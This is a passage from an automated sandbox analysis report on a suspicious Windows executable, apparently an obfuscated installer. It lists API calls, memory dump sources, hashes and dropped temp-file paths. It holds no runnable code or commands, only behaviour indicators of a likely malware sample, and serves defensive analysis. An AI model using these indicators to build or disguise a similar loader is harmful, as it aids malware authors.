                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointerwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 327478801-0
                                                                                                                                                                                    • Opcode ID: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
                                                                                                                                                                                    • Instruction ID: f1c15ab6bd15a9d9cc501090f462d0785fe3296bea48be5e975bb3477ad6cc2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7662d08dcc9a9cf2f1584379864cce10a11a63027859f8beda7d63d36f93d70d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49E06DB2B04216AED700BBA5AA49DBFBB68DB40314F20403BF544F10C1CA788D029B2D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 390214022-0
                                                                                                                                                                                    • Opcode ID: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                                                                                                                                                                                    • Instruction ID: f472a2c509351f333654906e099da5e6dfd11f42980ce41b172c94471a0d1cd1
                                                                                                                                                                                    • Opcode Fuzzy Hash: d24bdbc1146ceb37acbd80640b4da5ce9412419425c02070d407eaaf5c42416a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BE01A31B401246ADB207AB10E8E96E14989BC4744B29053ABE05B62C3DDBC4C414AB9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031A6,00000000,00000000,00402FD0,000000FF,00000004,00000000,00000000,00000000), ref: 00405B8A
                                                                                                                                                                                    Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
• Instruction ID: d6e1a33fd195441beba49eedd959afadaf6b56434895abd4101947bffd5346ea
• Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
• Instruction Fuzzy Hash: 21E0EC3221065EABDF10AE559C04AEB7B6CEB05360F004437F915E3150D635F9219BA8
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040315C,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BB9
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
• Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
• Instruction ID: 823d1a00ca840d25d454e1cdeec80758da7ba5e35e2b738bcb0e321267d0793f
• Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
• Instruction Fuzzy Hash: DEE0EC3222075EAFDF50AE559C00AEB7B7CEB05760F004437F925E2190E631F9219BAC
APIs
• VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002727
Memory Dump Source
• Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.21773320296.0000000010000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.21773382117.0000000010003000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.21773411311.0000000010005000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction ID: e09dfa788fffc30199ef0a9f627684cb70e95bce5f527532b7ad3e980fb418b3
• Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
• Instruction Fuzzy Hash: 67F09BF19092A0DEF360DF688CC47063FE4E3983D5B03852AE358F6269EB7441448B19
APIs
• RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E79,?,?,?,?,00000002,Call), ref: 00405E0F
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
• Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction ID: dc79c12829c29cd0bf07e2dbeefb197667dc07549b84f10616122407915bdb74
• Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
• Instruction Fuzzy Hash: E4D0123210060DBBDF115F90ED05FAB371DEB48314F004826FE45A4091E775D670AF98
APIs
• SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: f78411d9339179b1bfaf7e550eba22c56aaeced5b6accf1d661454cbe72d999c
• Instruction ID: 006896c4a7345e69559ade13805c89d17ea4f3f6c129434cfdd3d67a61d48342
• Opcode Fuzzy Hash: f78411d9339179b1bfaf7e550eba22c56aaeced5b6accf1d661454cbe72d999c
• Instruction Fuzzy Hash: 10D012727081129BCB10EBA8AB48A9E77A49B50324B308137D515F31D1E6B9C945672D
APIs
• SendMessageA.USER32(0001044A,00000000,00000000,00000000), ref: 00404084
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
• Instruction ID: da44989f2a2ecf2e1eb1395d2787a6f6d01b979c61270caf9d732ef337717c06
• Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
• Instruction Fuzzy Hash: B6C04C717406006AEA208B519E49F0677586750B11F1484397751F50D0C675E410DE1C
APIs
• ShellExecuteExA.SHELL32(?,0040444B,?), ref: 00405656
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 587946157-0
                                                                                                                                                                                    • Opcode ID: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                                                                                                                                                    • Instruction ID: fedc52184ae6edd1acf052e6849869f1d6de8b7351bc39b82099fbd6471e80b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dbb5c45fd0362357dc29e094c299a4b113cabf0b50495ccaf1730ce731ee503
                                                                                                                                                                                    • Instruction Fuzzy Hash: ECC092B2000200DFE301CF90CB18F077BE8AF55306F028058E1C49A160C7788810CB69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(00000028,?,00000001,00403E8B), ref: 00404069
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
• Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
• Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
• Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
APIs
• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 004031B7
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
• Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
• Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
APIs
• KiUserCallbackDispatcher.NTDLL(?,00403E24), ref: 00404052
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
• Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
• Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
• Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
• Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404A21
• GetDlgItem.USER32(?,00000408), ref: 00404A2C
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404A76
• LoadBitmapA.USER32(0000006E), ref: 00404A89
• SetWindowLongA.USER32(?,000000FC,00405000), ref: 00404AA2
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AB6
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404AC8
• SendMessageA.USER32(?,00001109,00000002), ref: 00404ADE
• SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEA
• SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AFC
• DeleteObject.GDI32(00000000), ref: 00404AFF
• SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2A
• SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B36
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BCB
• SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BF6
• SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0A
• GetWindowLongA.USER32(?,000000F0), ref: 00404C39
• SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C47
• ShowWindow.USER32(?,00000005), ref: 00404C58
• SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D55
• SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBA
• SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DCF
• SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF3
• SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E13
• ImageList_Destroy.COMCTL32(00000000), ref: 00404E28
• GlobalFree.KERNEL32(00000000), ref: 00404E38
• SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB1
• SendMessageA.USER32(?,00001102,?,?), ref: 00404F5A
• SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F69
• InvalidateRect.USER32(?,00000000,00000001), ref: 00404F89
• ShowWindow.USER32(?,00000000), ref: 00404FD7
• GetDlgItem.USER32(?,000003FE), ref: 00404FE2
• ShowWindow.USER32(00000000), ref: 00404FE9
Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004044E5
• SetWindowTextA.USER32(00000000,?), ref: 0040450F
• SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045C0
• CoTaskMemFree.OLE32(00000000), ref: 004045CB
• lstrcmpiA.KERNEL32(Call,benevolently Setup: Installing), ref: 004045FD
• lstrcatA.KERNEL32(?,Call), ref: 00404609
• SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040461B
  • Part of subcall function 00405665: GetDlgItemTextA.USER32(?,?,00000400,00404652), ref: 00405678
  • Part of subcall function 004061CF: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406227
  • Part of subcall function 004061CF: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406234
  • Part of subcall function 004061CF: CharNextA.USER32(?,"C:\Users\user\Desktop\asXlZG3aW6.exe",761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406239
  • Part of subcall function 004061CF: CharPrevA.USER32(?,?,761F3410,C:\Users\user\AppData\Local\Temp\,00000000,004031CC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403405,?,00000006,00000008,0000000A), ref: 00406249
• GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 004046D9
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046F4
  • Part of subcall function 0040484D: lstrlenA.KERNEL32(benevolently Setup: Installing,benevolently Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404768,000000DF,00000000,00000400,?), ref: 004048EB
  • Part of subcall function 0040484D: wsprintfA.USER32 ref: 004048F3
  • Part of subcall function 0040484D: SetDlgItemTextA.USER32(?,benevolently Setup: Installing), ref: 00404906
Strings
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A$C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243$Call$benevolently Setup: Installing
• API String ID: 2624150263-3830329200
APIs
  • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
• GlobalAlloc.KERNEL32(00000040,000014A4), ref: 10001B67
• lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
• lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
• GlobalFree.KERNEL32(00000000), ref: 10001BCC
• GlobalFree.KERNEL32(?), ref: 10001CC4
• GlobalFree.KERNEL32(?), ref: 10001CC9
• GlobalFree.KERNEL32(?), ref: 10001CCE
• GlobalFree.KERNEL32(00000000), ref: 10001E76
• lstrcpyA.KERNEL32(?,?), ref: 10001FCA
Memory Dump Source
• Source File: 00000000.00000002.21773351245.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_asXlZG3aW6.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
APIs
• CoCreateInstance.OLE32(00408514,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
• MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
Strings
• C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes, xrefs: 0040218D
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
Similarity
• API ID: ByteCharCreateInstanceMultiWide
• String ID: C:\Users\user\AppData\Local\Temp\Ethylamin\Gunocracy243\knejse\Trifliernes
• API String ID: 123533781-1124679380
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
Memory Dump Source
• Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                                                                                                                                                                                    • Instruction ID: 5589ad20af1132df25b1d4da55578e461c11660e8300270abb34f4e41d1b37c2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35474e701519af4a3bfe5b21ab3a1074e282d3bfb0b95cafabb6a5a8f21aa47d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BF0A0726041119AD710E7B49999EEEB778DB21324F60057BE685F20C1C6B88A469B2A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                                                                                                                                                    • Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.21759251190.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.21759216301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759287180.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759321249.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_asXlZG3aW6.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                                                                                                                                                    • Instruction ID: 968ea090ea57439d934916100a42e081e4144f1e312078ddc892fc3721ce49e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: fca4b55698b2abcc8e5cbf272b741b12ffb4e3b740e9774b5bdfc5da95159218
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18C14A31E0421ACBCF14CF68D4905EEBBB2BF99314F25866AD8567B380D734A942CF95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FA
